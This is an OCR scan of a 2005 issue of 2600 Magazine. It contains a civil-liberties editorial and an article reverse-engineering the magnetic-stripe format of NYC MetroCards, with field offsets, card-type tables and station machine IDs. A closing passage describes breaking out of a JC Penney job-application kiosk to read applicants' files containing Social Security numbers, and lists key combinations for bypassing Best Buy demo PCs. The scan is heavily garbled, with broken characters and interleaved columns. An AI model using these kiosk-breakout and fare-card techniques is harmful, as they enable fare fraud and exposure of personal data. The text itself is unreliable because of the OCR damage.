You are on page 1of 64

Alicante, Spain.

A standard ghenc through-


out t h e country. I t takes credit cards and
coins. I n addition this phone has SMS and
fax capabilities.

m
li eril&d by n.TI& me
coin $ W a s w&mflkr
-d-@~-~pr I T Jlholl..

7
For more exciting foreign payphone photos,
take a Look a t the inside back cover!
and say, it lately seems t h a t it would be t h e the FCC has made it i t s mission t o become the
endless f i g h t against t h e increasing restrictions morality police o f t h e airwaves. Congress has
of our society. Whether it's t h e Latest govern- jumped i n on t h e act, apparently frightened by
ment crackdown on something t h a t wasn't even a few crusaders o f decency i n t o thinking t h a t
a crime a decade ago o r another corporate law- such restrictive views reflect those of t h e na-
suit against someone whose actions would have tion. Their latest idea i s t o impose fines o f
seemed completely harmless i n another time or $500,000 for each and every utterance o f a
place, we cannot seem t o shake this perpetual word they disapprove of. While few would sup-
f i g h t we're forced into. And, Like most things, port the idea o f turning t h e public airwaves
there i s good and bad i n this fact. i n t o a bastion o f gutter speech, what these
Fighting i s good. It keeps you awake and re- threats have accomplished i s t o instill fear and
defines what it is you stand for. Done properly, force broadcasters t o constantly err on t h e side
it can also open up a l o t of eyes and bring a o f caution. Translation: n o controversy, nothing
great number of people i n t o t h e battle, hope- outside t h e norm, and a great deal o f paranoia.
fully on your side. But becoming a constant vic- The re,sult is a wlhole l o t o f blandness which is
tim of what's going on around you isn't at a l l far wclrse than an occasional displa y o f bad
constructive. I n some ways we seem t o always taste.
expect things t o get worse and when they do We a u ~ t u > laugh
t a t absurdities Lllc

we're not surprised. And with that, we Lose our Fraudulent Online Identity Sanctions Act which
outrage and replace it with resignation. actually i s being considered by t h e House of
We need t o do everything i n our power t o Representatives. It's designed t o deal with one
avoid falling i n t o t h a t latter category. That's of t h e nation's biggest crises: people submit-
what we hope t o accomplish i n these pages - t o ting false information when registering Inter-
challenge, t o ask questions, t o n o t be intimi- n e t domain names. While this i n itself wouldn't
dated i n t o acquiescence. The only reason we've be enough t o get you convicted o f a crime (yet),
survived this long is because our readers have it can be used t o significantly enhance penal-
been there t o encourage us and t o prove t h a t ties if, for example, someone i s sued over t h e
what we say and what we do actually counts for content of a web page. Many whistle-blower
something. It's important t o extend t h a t reas- and dissident websites would f i n d it impossible
surance a l l throughout t h e community - indi- t o operate if they had t o do so while giving out
vidually and collectively - so t h a t we n o t only their realidentities and locations. Yet such sites
survive but grow stronger. I n this way it w i l l i n - provide a very valuable service t o t h e public. By
deed be possible t o reverse the tide and build adding this intimidation, it suddenly becomes a
something positive. potential crime t o t r y and remain anonymous.
We a l l derive a fair amount o f pleasure i n Equally absurd i s a new law passed i n Utah
listing t h e latest negative trends i n our society. t h a t requires Internet service providers t o keep
So let's take a little time t o focus on some o f track o f and provide a way t o block access t o
the highlights. porno!graphic websites. While this may sound
The recent actions o f t h e Federal Communi - attracti v e t o a politician or a media outlet seek-
cations Commission have been quite frighten - i n g t o whip up hysteria, this has always been
i n g i n their zeal t o restrict and punish speech something t h a t a user could easily implement
t h a t they disapprove of. Because of t h e trauma with varying degrees o f success using different

,
suffered due t o the events o f February 1, 2004
(when part o f Janet Jackson's breast was mo-
types o f software. But now t h e ISP i s being ex-
pected t o take on this responsibility, somehow
/keeping track of every website i n the world that bombarding us is the best thing t h a t could have\
has material deemed "harmful t o minors" and happened for those who want more control,
facing felony charges i f they don't block access more surveillance, and a crackdown on dissent.
t o them on demand. The mere creation and dis- When all is said and done, it's clear who the
tribution of such a blacklist by the government real enemy of the people is. While the mass me-
is an incredible waste of time and effort at best. dia, government, and corporate world would
It's as ridiculous an expectation as what we see Like that enemy t o be those who challenge the
i n many restrictive foreign regimes where the
system, we believe they're i n for a disappoint-
realities of the net simply aren't considered i n
ment. That designation belongs t o those who
the face of religious and/or totalitarian
are hard at work dismantling t h e freedoms that
zealotry. Like so many other ill-advised bits o f
Legislation Lately, the power and responsibility we have a l l aspired t o i n the interests of "secu-
of the individual is being overlooked i n favor of rity" or because they feel they have Lost control.
proclamations from governmental agencies who It's clear that they should Lose control because
really have no business dictating morality. it's obvious that power i n their hands i s not a
None of this even begins t o address the evils good thing at all.
of the Patriot Act and its proposed successors, The fact is most people get it. They have lit-
legislation drawn up and passed quickly i n the tle problem dealing with controversy, differing
wake of September 11without debate or analy- opinions, or common sense. They don't need t o
sis of any significance. We've devoted space i n be talked down t o or have their hands held at
these pages i n the past t o the risks we all face every step of the way. Most people understand
as a result of this monumentally bad idea. No that the world they Live i n isn't Disneyland and
doubt we will continue t o do so i n the future. that an adult society doesn't have t o be reduced
And this is certainly not something restricted t o a child's level i n order t o be safe. But too
by our borders. Recently the "Anti-Terror Law" many of these same people don't step up when
was finally passed i n Britain after much debate. others try and restrict what they can say, do,
This new law allows the authorities to detain
read, access, or even think. Maybe they assume
British citizens as well as foreigners indefinitely
someone else will do this for them. Maybe they
and without charge i f they are "terrorist sus-
pects," a classification which no doubt will be think they're actually i n the minority and ought
bent i n all sorts of imaginative directions t o t o stay quiet for the purpose o f self-preserva-
suit the accusers. It also becomes the only tion. Or perhaps they just don't take any of
country i n the European Union t o suspend the these people seriously and are content t o laugh
right t o a fair trialin such circumstances. About at them from the sidelines. ALL o f these are pre-
the only bit of positive news t o come out of this cisely the reactions that t h e control seekers
is that extensive debates won the right t o have want more than anything. "ALL that is required
this law reviewed and possibly repealed i n for evil t o triumph is for good men t o do noth-
2006. Again, we are reminded of what Ben ing." We can't fall into that trap.
Franklin once said: "Those who would give up What can we do? It's really simple. Unity on
essential liberty for temporary safety deserve these issues is all we need. Wherever you find
neither liberty nor safety." I n a quote that yourself i n today's world, you have a voice and
seems t o fit this categorization remarkably you can reach and influence people on all dif-
well, Prime Minister Tony Blair said, "Those con- ferent levels. All it takes is t h e desire t o do this
siderations of national security have t o come and a Little persistence. Educate yourself on the
before civil liberties however important they
issues and why they matter. Bring it up at your
are."
place or work, i n your school, t o your parents,
When you look closely at these trends and
those that we have been covering over the friends, or children. Don't be shrill or offensive.
years, it becomes clear that most of them have Put yourself i n the position o f other people and
nothing t o do with September 11, threats of at- inject your insight into the equation so that you
tack, wars and invasions, or anything else that can effectively communicate why the issues
we've lately become obsessed with. Rather, that matter t o you should also matter t o them.

I
these incidents have become excuses for push- This is how movements are born. And that is
ing policies that have been i n the works for what we need if we hope t o escape what is
years. The element of fear that is constantly looming on the horizon.
"If tyranny and oppression come to this land, it
will be in the guise o f figh ting a foreign enemy.
- James Madison. 1

2 Floweilield, St. James, NY 11780.


Periodicals postage paid a t St. James, NY and additional offices.
POSTMASTER:
Send address changes t o
2600, P.O. Box 752 Middle Island, NY 11953-0752.
Copyright (c) 2005
2600 Enterprises, Inc.
YEARLY SUBSCRIPlION:
U.S. and Canada - $20 individual,$50 corporate (US. funds).
Overseas - $30 individual, $65 corporate.

II
Back issues available for 1984-2004 at $20 per year, $26 per year overseas.
Individualissues available from 1988 on at $5.00 each, $6.50 each overseas.

IADDRESS ALL SUBSCRIPTION CORRESPONDENCE TO:


2600 Subscription Dept., P.O. Box 752 Middle Island, NY 11953-0752 (subs@2600.com).
FOR LEllERS AND ARTICLE SUBMISSIONS, WRITE TO:
2600 Editorial Dept., P.O. Box 99 Middle Island, NY 11953-0099
(Letters@26OO.com, articles@2600.com).
2600 Office Line: 6 3 1 - 7 5 1 - 2 6 0 0
2600 FAX Line: 6 3 1 - 4 7 4 - 2 6 7 7
.. . - .
by Redbird include reduced-fare cards, student cards, and
redbird@2600.com employee cards.
I n this article, Iwill explain many of the inner Single-Track MetroCard. This term will refer t o any
workings of the New York City Transit Authority fare col- MetroCard that has a one-track magnetic stripe (al-
lection system and expose the content of MetroCards. I though there is no visible difference between the
will start off with a description of the various devices of stripes of these cards and the stripes of two-track
the fare collection system, proceeding into the details cards). The following types of cards are single-track:
of how t o decode the Metrocard's magnetic stripe. This Single-Ride and Bus Transfer MetroCards.
article is the result of many hours of experimentation, Dual-Track MetroCard. This term will refer t o a l l
plenty of cash spent on MetroCards (you're welcome, MetroCards with the exception o f the Single-Track
MTA), and Lots of help from several people. I'd like t o MetroCards mentioned above. The following types of
thank everyone at 2600, O f f The Hook, and all those cards are some examples of dual-track cards: pay-per-
who have mailed i n cards and various other informa- ride, pre-valued, unlimited, and reduced-fare.
tion. Passback Period. This term w i l l refer t o the time pe-
Becoming familiar with how magnetic stripe tech- riod before an access device will allow you t o use an un-
nology works will help you understand much of what is limited card again after swiping it. During this period,
discussed i n the sections describing how t o decode the devices generally respond with t h e message "JUST
MetroCards. More information on this, including addi- USED".
tional recommended reading, can be found i n "Mag- Standard Cards and Standard Readers. These terms
netic Stripe Reading," also i n this issue. w i l l refer t o cards containing a magnetic stripe (credit,
Terms banking, etc.) or readers of these cards that conform t o
These terms will be used throughout the article: the standards set forth i n any or all o f the following IS0
FSK - Frequency Shift Keying. A type of frequency specifications: 7810, 7811, 7813, and 4909.
modulation i n which the signal's frequency is shifted Cubic Transportation Systems
between two discrete values. The fare collection system t h e MTA uses was
MVM - MetroCard Vending Machine. MVMs can be developed by Cubic Transportation Systems, a
found i n every subway station. They are the large vend- subsidiary of Cubic Corporation. The patents I found t o
ing machines which accept cash i n addition t o credit be related t o the current New York City system filed by
and debit. Cubic Corporation are as follows:
4,877,179 - Farebox S e c u r i t y D e v i c e
MEM - MetroCard Express Machine. MEMs are vend- 5,056,261 - T u r n s t i l e System
ing machines that accept only credit and debit. They are 5,072,543 - T u r n s t i l e Mechanism
often located beside a batch of MVMs. 5 , 1 9 1 , 1 9 5 - F a r e Card R e a d - W r i t e r Which
-Overwrites Oldest o r Invalid Data
MTA - Metropolitan Transportation Authority. A 5,215,383 - T i c k e t S t o c k and T i c k e t D i s p e n s e r
I public benefit corporation of the State of New York re- 5 , 2 9 8 , 7 2 6 - F a r e Card R e a d - W r i t e r Which
sponsible for implementing a unified mass transporta- -Overwrites Oldest o r Invalid Data
5 , 3 3 3 , 4 1 0 - C o n t r o l l a b l e B a r r i e r S y s t e m For
I tion policy for New York City and counties within the - P r e v e n t i n g Unpaid A d m i s s i o n t o a Fee-Paid Area
"Transportation District." 5 , 5 7 4 , 4 4 1 - Mass T r a n s i t I n d u c t i v e D a t a
NYCTA - New York City Transit Authority. Under the -Communication S y s t e m
5 , 6 1 2 , 6 8 4 - Mass T r a n s i t I n d u c t i v e D a t a
control of the MTA, the NYCTA is a public benefit corpo- CCommunication System
ration responsible for operating buses and subway 6 , 5 9 5 , 4 1 6 - S y s t e m For R a p i d l y D i s p e n s i n g and
trains i n New York City. -Adding Value t o Fare Cards
6,655,587 - Customer A d m i n i s t e r e d A u t o l o a d
RFM - Reduced-Fare MetroCard. RFMs are available 6,789,736 - D i s t r i b u t e d A r c h i t e c t u r e For
t o the elderly or people with qualifying disabilities. ,Magnetic Fare Card P r o c e s s i n g
Typical RFM fare is half or less than half of the standard Servicing, apart from routine collection o f
fare. fares, on MTA equipment seems t o be done by
Common MetroCard. This term will refer t o any
MetroCard available t o the public without special re-
Cubic employees, not the MTA.
quirements. Examples include standard pay-per-ride The MetroCard System
cards, standard unlimited cards, and single-ride cards. At the core of the MTA fare collection system
Special MetroCard. This term will refer t o any Metro- i s t h e MetroCard. Preceded by a token-based sys-
i Card not available t o the general public. Examples tem, the MetroCard i s n o w used for every aspect
Page 7 A
\
fare collection and allows for fare options that would never have been previously possible (e.g., Em-
ployee, Reduced-Fare, and Student MetroCards). MetroCards can currently be purchased a t MVMs,
MEMs, token booths, and various merchants throughout the New York City area. Iwill categorize t h e
Metrocard access devices into two types: reading devices and fare collection devices. Both of these de-
vices are networked i n a complex system which allows the MTA, within minutes, t o have up-to-date in-
formation on every card that has been issued. This also allows them t o disable any card at will. The
hierarchy of the network i s shown below (as described i n patent 6,789,736).
OUT OF SVSTEM AWs- -
i
PRIM4RY COMROL AREA -

K!7
BhEP* DUT

!nKENsooTW.Eaur9?ENz
....Z.....Z......
i
TURNSTILES

[IKEhl BO@T
EYC QAR ENILODEFI
F F U FF

The physical characteristics o f MetroCards follow those of standard cards (see Terms) almost ex-
actly, but are one third the thickness. They have a diagonal notch cut out i n the upper-right hand cor-
ner 3 1/8" from the Left and 5/16" from the top of the card. Additionally, they have a 1/8" diameter
hole, with its center 1/4" from the left and 5/16" from the top of the card, which is used t o aid
machines that suck your card i n (bus fare boxes, MEMs/MVMs, handicapped entry/exit machines, etc.).
Vending Machines
MEMs and MVMs are Located throughout the subway system. They allow you t o purchase or refill
various common MetroCards with either cash or a credit card. RFMs can't be purchased at machines but
can be refilled. On the front of the MEM or MVM i s a tag with the machine's unique I D number.
The BIOS System Configuration screen from an MEM looks Like this:
AMIBIOS S y s t e m C o n f i g u r a t i o n ( C ) 1 9 8 5 - 1 9 9 7 , American Meqatrends Inc.,

Main P r o c e s s o r : Celeronftm) B a s e Memory S i z e : 640KB


Math P r o c e s s o r :Built-In E x t . Memory S i z e : 14336XB
F l o p p y D r i v e A: : None Display Type : VGA/EGA
F l o p p y D r i v e B: : None Serial Port(s) : 3F8,2F8
AMIBIOS D a t e : 07/15/95 Parallel Port(s) : 378
Processor Clock : 3 0 0 A MHz E x t e r n a l Cache : 128KB,Enabled

ATA(P1) D e v i c e ( s ) T y p e Size LBA 32Bit Block PI0


Mode Mode Mode Mode
Primary Master : Hard D i s k 5729MB LBA On 16Sec 4

PC1 Devices: PC1 O n b o a r d USB C o n t r o l l e r , I R Q l l


PC1 Onboard B r i d g e D e v i c e PC1 O n b o a r d E t h e r n e t , I R Q l 5
PC1 Onboard IDE
PC1 Onboard VGA

FPGA ver. C , B a s e A d d r e s s : 500h


BSP CPU.. ...
M i c r o c o d e OK

I have no reason t o believe that the MVM hardware is any different.

t b 0 0 Magazine
\
Receipts
Receipts can be obtained from MEM and MVM machines by answering "yes" when prompted. They
possess a lot of information about the MEM/MVM, subway station, and card. You can match a receipt t o
a card by comparing the serial numbers. Let's take a look at some samples:
MVM RECEIPT MVM RECEIPT MEM RECEIPT

MTA NYC TRANSIT MTA NYC TRANSIT MTA NYC TRANSIT


ASTOR PLACE NASSAU AV & MANHATTAN AV 14TH STREET & 6TH AVENUE
NEW YORK CITY NY NEW YORK CITY NY NEW YORK CITY NY

MVM #: 0 5 4 5 f R 2 1 9 0701) MVM #: 1738(N408A 0 5 0 0 ) MEM #: 5383(N513 0 4 0 0 )

T r a n s : S a l e OK T r a n s : S a l e OK T r a n s : Add T i m e OK
P a y m e n t Mode: C a s h P a y m e n t Mode: C r e d i t Amount : $ 10.50
Amount : $ 7.00 Amount : $ 21.00 I n i t i a l Type:030
Card Value: $ 0.00 Card Value: $ 0.00 7-DAY RFM UNLIMITED
C h a n g e Due: $ 3.00 Time Added: 030
C r e d i t C a r d #: XX5346 7-DAY RFM UNLIMITED
S e r i a l #:I059909877 Auth#: 0 0 0 0 0 8
Type: 023 R e f #: 0 6 0 6 1 5 7 6 2 1 2 9 ATM C a r d #: XX0952
1 -DAY UNLIMITED Auth#: 7 6 0 3 4 6
S e r i a l #: 1 0 2 7 0 6 6 8 4 8 R e f #: 0 2 9 0 8 9 5 5 9 6 6 8
Questions? T y p e : 024
C a l l ( 2 1 2 ) METROCARD 7-DAY UNLIMITED S e r i a l #:0987218036

Questions? Questions?
C a l l ( 2 1 2 ) METROCARD C a l l ( 2 1 2 ) METROCARD

Most o f the information on t h e receipt i s fairly obvious, but notice the line t h a t begins with "MEM
#" or "MVM # .The first four digits correspond t o the actual MEM or MVM I D number as found on t h e
machine. The next Letter and following three digits inside the parenthesis correspond t o t h e closest
token booth. This ID can also be found on the booth itself. The meaning of t h e next f o u r digits i s cur-
rently unknown. However, they are unique t o each machine that has the same b o o t h ID, but are not
unique among machines with different booth IDS. They seem t o simply be a unique I D for each
MEM/MVM i n the station, possibly grouped by location. See "MEM/MVMsH for a table.
Now Look t o the bottom of the receipt. The Line t h a t begins with "Type:" (or " I n i t i a l Type:" if an RFM
is being refilled) gives the numerical card subtype value followed by a description o f t h e type on the
following Line.
Receipts purchased with a credit card contain additional fields that allow t h e MTA t o verify the
credit card holder i n the case that he/she decides t o Lose t h e MetroCard.
Turnstiles
The use of a turnstile i s the most common way t o enter the subway. Entry i s granted by swiping a
valid MetroCard through the readerjwriter located on the outside of each turnstile. Once swiped, the
LCD display on the turnstile will display a message. Some common messages:
GO. Message displayed for Unlimited MetroCards.
GO. I RIDE LEFT. Message displayed for Student MetroCards, where "1"is the number o f rides Left for
the day.
JUST USED. The passback period for the Unlimited MetroCard i s not up.
GO. 1XFER OK. Message displayed when transferring from a bus.
Above the LCD there are a series of round indicators. Of these, one has an arrow pointing i n the di-
rection of the turnstile i n which you would enter after paying your fare, and another reads "No" and a
do-not-enter bar which, when lit, indicates that the turnstile is not active. After paying your fare, an-
other indicator below the green arrow lights t o indicate that you may proceed through t h e turnstile
without smashing your groin i n t o the arm.
Above those, there are three horizontal bar indicators contained within a rectangular cutout. When
a Reduced-Fare MetroCard is swiped, the top indicator (red) will light. When a Student MetroCard i s
swiped, the middle indicator (yellow) will Light. When an Employee MetroCard i s swiped, t h e bottom
indicator (the color of which I ' m unsure of) w i l l light. These indicators are present on both sides of the
turnstiles and they allow transit cops, many o f whom are undercover, t o monitor t h e types o f cards be-
i n g used by riders. This helps detect, for example, when Student MetroCards are being used a t times
when school is not i n session or when an obvious misuse o f an Employee or Reduced-Fare MetroCard
occurs.
F >
Reading MetroCards
MetroCards are relatively difficult t o read. You will not be able t o read them with off-the-shelf mag-
netic stripe readers, so please don't waste your money. The reason for this i s not t h a t the format i s dif-
ferent; MetroCards use Aiken Biphase (also known as frequency shift keying (FSK)) just like standard
cards. However, the hardware that ships with these readers is designed for a completely different (and
well-documented) specification. They require many "clocking bits," which consist of a string o f zero-
bits at the beginning of the stripe t o aid i n setting a reference frequency for decoding. Additionally,
most readers also look for a standard start and end sentinel that exists on standard cards t o denote
the start of a particular track. On top o f that, characters on these cards are defined as either four or
six b i t blocks (depending on the track) and contain a longitudinal redundancy check (LRC) character
after the end sentinel t o verify data integrity. Needless t o say, MetroCards don't have any of these
properties and contain fields of arbitrary length; thus, another method of reading and decoding i s re-
quired.
Fortunately, magnetic heads are everywhere (e.g., cassette tape players) and the output from mag-
netic heads when passed over a magnetic stripe consists of voltage spikes i n the audible frequency
range. Since sound cards are excellent A/D converters for this range of input and are readily available
and very cheap, we can use the microphone input interfaced t o a magnetic head for the purpose of
creating our own reader (for a l o t less than the MTA i s paying, I'm sure!). See the article "Magnetic
Strioe Readina" i n this issue for more details.

1 For the same reason t h a t reading was initially difficult, writing t o MetroCards i s extremely difficult,
and is still a work-in-~roqresswhich will not be discussed i n this article. A techniaue similar t o that of
t h e decoder (in reverie) ;an be used t o write t o cards, although it i s much more difficult t o implement
and obviously requires more equipment than just a sound card and a magnetic head. For those of you
who realize how this can be done and have the ability t o build the equipment, kudos, but keep i n mind
the ramifications of being caught using a card you wrote t o yourself. Modifying the data on cards does
work. But the MetroCard system is very complex and allows for the surveillance of this sort of activity.
The goal of this project i s t o learn how the system works, how it can be theoretically defeated, but cer-
tainly not t o get stuck i n prison.
Apart from these difficulties, MetroCard tracks are defined as follows: Dual-Track MetroCards have
two tracks - one track being twice the width of the other - and will be referred t o as track 1-2 and track
3; Paper MetroCards have one track which will be referred t o as track 1-2. These track names (as I
refer t o them) correspond t o the same track fields t h a t have been established by IS0 7811.
-
Decoding Dual-Track MetroCards Track 3
Track 3 on Dual-Track MetroCards contains static data. It i s written when the card is produced and
the serial number is printed on the back, and i s not written t o thereafter by any machine. Some data
found on this track can also be found by looking at the information printed on t h e back of the card.
The track format is as follows:
Track 3 C o n t e n t O f f s e t Length
--------------- ------ ------
1: Start Sentinel 0 15
2: Card Type 15 4
3: Unknown 19 4
4: E x p i r a t i o n Date 23 12
5: Unknown 35 4
6: Constant 39 8
7: unknown 47 8
8: S e r i a l Number 55 80
9: Unused 135 16
10: Unknown 151 16
11: End S e n t i n e l 167 93

Decoding track 3 is accomplished as follows:


I. Constant: OOOOOOOllOOOlZl
2. Convert binary t o decimal
* See "Card Types" for a lookup table.
3. Use is n o t y e t known
4. To determine the expiration date for common MetroCards:
* Convert binary to decimal
* Divide the decimal value b y 2, round up
* Convert the decimal value to year/month format as follows:
o Year: Integer value o f the decimal value divided by 12
o Month: Value o f the modulus o f the decimal value and 12
* A d d 1992 to the year
\Page I D 2600 Magazine 1
r
* The expiration date is the last day o f the previous month
* Note: Non-common MetroCards seem to have different date
offsets
* Note: This expiration date is the date the physical card can
no longer be used and is considered invalid. See the track
1-2 expiration date field for more information.
5. Use is notyet known
6. Constant: 00001101
7. Use is not yet known
8. Convert binary to decimal
9. Unused field
10. Use is not yet known
11. Constant:
00100101001100100110100101100101010011001010010
1001100110101010011010010101001101001010110101

Decoding Dual-Track MetroCards Track 1-2 -


Track 1-2 on Dual-Track MetroCards contains variable data. It i s written t o by every machine used
for fare collection, reading devices excluded. Interestingly enough, track 1-2 does n o t only contain i n -
formation pertaining t o the last use, but also t o the use before that. These two records are separated
by a strange set of field separating bits, which contains i n it a b i t t h a t seems t o be h a l f o f t h e one-bit
frequency (which i s a non-standard use of FSK). The most reliable way t o find t h e second track i s t o
search for a second start sentinel, both o f which are identical for each record. The track format i s as
follows:

Content Offset

Start Sentinel
Time
Card Sub-Type
Time
Date
T i m e s Used
E x p i r a t i o n Date
Transfer B i t
L a s t Used ID
C a r d Value
P u r c h a s e ID
Unknown

Decoding track 1-2 is accomplished as follows:


1. Constant: O O l l O l O l l l
2. See 4
3. Convert binary to decimal
* The card sub-type corresponds to the sub-type as indicated
on the receipt if one was obtained from an MEM/MVM.
* See "Card Types" for a lookup table.
4. To deal with the limited storage space on the Metrocard stripe,
each bit in this field and field (2) represents 6 minutes. To
determine the last time used for common MetroCards:
* Concatenate the binary from (2) with the binary from this
field
Convert to decimal
* Multiply decimal value by 6
* Result is the number of minutes since 01:OO that the card
was last used
5. Convert binary to decimal
This field contains the last usage date, which can be
determined by calculating an offset based on a card o f the
same type with a last usage on a known date. However, since
this field only has 10 bits, dates will most likely roll
overafter 1024 (2"IO) days anda new ofr4et will have to be
determined. Offsets also seem to differ with different types
of MetroCards.
6. Convert bina ry to decimal
* The times used field is incremented every time you use the
/ card to pay a fare except during a transfer. I n that case, the
transfer bit is set and the times used field remains the same.
7. Convert binary to decimal
* Determine offset based on the description in 5 to determine
the exact expiration date o f a card. Alternatively, subtract
the date field from this field to determine how many days
after the last usage the card expires.
* Do not confuse this field with the expiration date field on
track 3; it is only used on cards which expire a set number
of days afteryou first use them (e.g., unlimited cards) and
will not be set for cards such as pay-per-ride which do not
have an expiration date.
8. Bit is 1 i f the last use was for a transfer, 0 otherwise
9. Convert binary to decimal
* This field seems to have a completelyseparate lookup table
that is used internally by the fare collecfion system.
* See "Last Used IDS" for a lookup table.
10. Convert binary to decimal
* The result is the value remaining on the card in cents.
11. Convert binary to decimal
This field seems to have a completelyseparate lookup table
that is used internally by the fare collection system to match
the value of this field with an MVM ID number (such as those
you can find on receipts).

Card T y p e s ( p a r t i a l )
Type Subtype Description
---- ------- -----------
0 0 FULL FARE
0 10 PRE-VALUED
0 12 PRE-VALUED ( $ 1 0 . 0 0 )
0 13 PRE-VALUED ( $ 2 . 0 0 )
0 14 L o n g I s l a n d R a i l Road
0 19 PRE-VALUED ( $ 4 . 0 0 )
0 23 1-DAY UNLIMITED ( $ 2 . 0 0 f a r e )
0 24 7-DAY UNLIMITED ( $ 2 . 0 0 f a r e )
0 25 7-day E x p r e s s Bus U n l i m i t e d ($4.00 f a r e )
0 26 30-DAY UNLIMITED ( $ 2 . 0 0 f a r e )
0 29 AIRTRAIN
0 30 7-DAY RFM UNLIMITED ( $ 2 . 0 0 f a r e )
0 43 TransitChek
0 46 TransitChek
0 47 TransitChek
0 48 T r a n s i t C h e k 30-DAY UNLIMITED
0 56 1-DAY UNLIMITED ( $ 1 . 5 0 f a r e )
0 57 7-DAY UNLIMITED ( $ 1 . 5 0 f a r e )
0 59 30-DAY UNLIMITED ( $ 1 . 5 0 f a r e )
0 62 SingleRide ($1.50 f a r e )
0 87 S i n g l e R i d e ($2.00 f a r e )
4 2 Two-Trip S p e c i a l Program P a s s
4 5 G r a d e s 7-12
4 13 1 / 2 F a r e - G r a d e s K-12

L a s t U s e d IDS ( p a r t i a l )
ID Location
-- - - ----- -
1513 1 4 t h S t / U n i o n Sq
1519 8 t h St/Broadwav tA39)
1880 L e x i n g t o n Ave - ( ~ 6 0 l ) '
1942 ASTOR PLACE ( R 2 1 9 )
2157 34th S t / 6 t h Ave (N506)
2204 42nd St/Grand C e n t r a l
2278 9 t h S t r e e t PATH

MEU/ElYMs (partial)
Location
----
14TH ST. - UNION SQUARE MVM
14TH ST. - UNION SQUARE MVM
14TH ST. - UNION SQUARE MVM
14TH ST. - UNION SQUARE MVM
14TH ST. - UNION SQUARE MVM
14TH ST. - UNION SQUARE MVM
14TH ST. - UNION SQUARE MVM
14TH ST. - UNION SQUARE MVM
14TH ST. - UNION SQUARE MVM
8TH STREET 6 BROADWAY MEM
8TH STREET 6 BROADWAY MEM

\Page 32 1?bD0 flagazine /


6 5 S T ~6 FT.~ HAMILTON
14TH STREET 6 8TH AVE
MVM
MEM
0982(CO28
5314(HOOl
0700)
0702)
This project is far from over, a n d there are still\
I S T AVE 6 14TH STREET MVM 1358(H007 0700) tons o f data that need t o be collected. You can
1ST AVE 6 14TH STREET MVM 1145(H007 0701)
1 7 5 ST/FT. WASHINGTON AV MVM 1632(N010 0400) help i n many ways:
I 7 5 ST/FT. WASHINGTON A MVM 1 6 1 1 (NO10 0700) * Collect receipts every t i m e you purchase a
I 7 5 ST/FT. WASHINGTON AV MEM 5274(N010 0701)
W 4TH ST - WASHINGTON SQ MVM 0321(N080 0700) MetroCard and send them t o us. This w i l l help us
W 4TH ST - WASHINGTON SQ MVM 0109(N080 0701)
FORDHAM ROAD MVM 0550(N218 0700) expand (and keep updated) our database of the
LEXINGTON AVE - 3RD AVE MVM 0740(N305 0401) booths and MEMs/MVMs contained within each
NASSAU AV 6 MANHATTAN AV MVM 1738(N408A 0500)
34TH STREET/SIXTH AVENUE MVM 1428(N506 0702) station. Also, if possible, keep t h e MetroCard as-
34TH STREET/SIXTH AVENUE MVM 0540(N507 0701)
14TH STREET 6 6TH AVENUE MEM 5383(N513 0400) sociated with t h e receipt.
CHRISTOPHER STREET
CHRISTOPHER STREET
MVM
MVM
0637(R125
0063(R125
0700)
0701)
* I f you notice anything unusual, such as a
14TH STREET - 7TH AvENUE MVM 0294(R127 0400) frozen MTA kiosk (MEM, MVM, reader, etc.), open
I4TH STREET - 7TH AVENUE MVM 1643(R127 0401)
I4TH STREET - 7TH AVENUE MVM 0357(R127 0700) equipment (while repairs are being done), or
I4TH STREET - 7TH AVENUE MVM 0376(R127 0701)
34TH STREET-PENN STATION MVM 0553(R138 0701)
anything else, take some good pictures. As o f
WALL STREET 6 BROADWAY MVM 1123(R203 0400) now, photography bans are being proposed for
WALL STREET 6 BROADWAY MVM 1038(R203 0700)
ASTOR PLACE MVM 0654(R219 0400) the New York City subway system, b u t are not yet
ASTOR PLACE MVM 0586(R219 0700)
ASTOR PLACE MVM 0545(R219 0701)
i n place. So know your rights.
ASTOR PLACE MVM 0744(R220 0700) * I f you're paying for a bus r i d e with change,
ASTOR PLACE MVM 0318(R220 0701)
14TH ST. - UNION SQUARE MVM 0576(R221 0400) get a Bus Transfer MetroCard a n d send it t o us if
I4TH ST. - ONION SQUARE MVM 0514(R221 0401)
I4TH ST. - UNION SQUARE MVM 0475(R221 0700)
you don't intend t o use it. Make sure you note the
14TH ST. - UNION SQUARE MVM 0564(R221 0701) route, direction, time, date, a n d any other ap-
23RD STREET - PARX AVE MVM 0489 (R227 0701)
28TH STREET - PARK AVE MVM 1228(R229 0700) plicable information.
Conclusion New things are being discovered and more
As you may have noticed, Ihaven't provided a data is being collected every day, so consider this
way t o decode the Single-Track MetroCards yet. article a "snapshot" o f a work i n progress. You can
Bus Transfer MetroCards are collected after use find and contribute t o t h e data being collected
and the magnetic stripe of Single-Ride Metro-
Cards i s written with bogus data after use. We on this system at http://www.2600.com/mta and
simply haven't received enough unused samples by sending us additional information a t 2600
t o be able t o reverse-engineer a l l the information Metrocard Project, PO Box 752, Middle Island, NY
contained on these cards. 11953 USA.

by clorox ton and the tasktray. The start menu was bare,
I'm sure most people searching for a job have no way for me t o execute an application there,
filled out an electronic application a t a business just a shutdown button. But i n t h e task tray they
on one of their machines. I know about four had Mcafee Antivirus running. I ' m n o t sure if it
months ago my friend was looking for a job and I was a corporate enterprise version b u t Idouble
figured I ' d help him find one. No one was hiring clicked it t o t r y t o find a way Icould access t h e
so he decided t o t r y a store i n the mall. The store hard drive. There was a field w i t h a browse but-
was JC Penney. We were brought i n t o a room with ton next t o it where you could change your virus
two computers. He sat down and started t o fill database and it let me view t h e hard drive as well
out his application and I,being the curious one I as the networked drives. Iopened a notepad file
am, snooped around. just so Icould see t x t files easier i n t h e browser.
The application itself was an html file t h a t Iwas snooping around when Icame upon a folder
was being shown i n IE i n fullscreen mode. Con- i n t h e C drive called apps.
trol-alt-delete did no good so Icontrol escaped The text files i n this folder were titled by a
, and it brought up the taskbar with the start but- nine digit number. Iopened o n e o f t h e text files
\Xpt-ing so05 page 1 3 1
\
/and it was Amie Laster's application. Formatted BestBuy:
i n this way: On their employee PCs near the CDs, control A
I I
ssn-ssns-snn Amie Laster 0000101010101 and Z three times brings up the employee toolkit
(this varies by store but it's a combination of con-
~010110101011
trol, alt, or shift with two keys on the keyboard),
The others were exactly like this so anyone which you need a login t o use. On the demo PCs
could just sit down here, access everyone's appli- you can either double click the numbers on the
cations, and pretty much exploit the person using right hand side or press control M t o minimize the
this data. Isent an anonymous letter t o the dis- advertisement so you can access the drive. Their
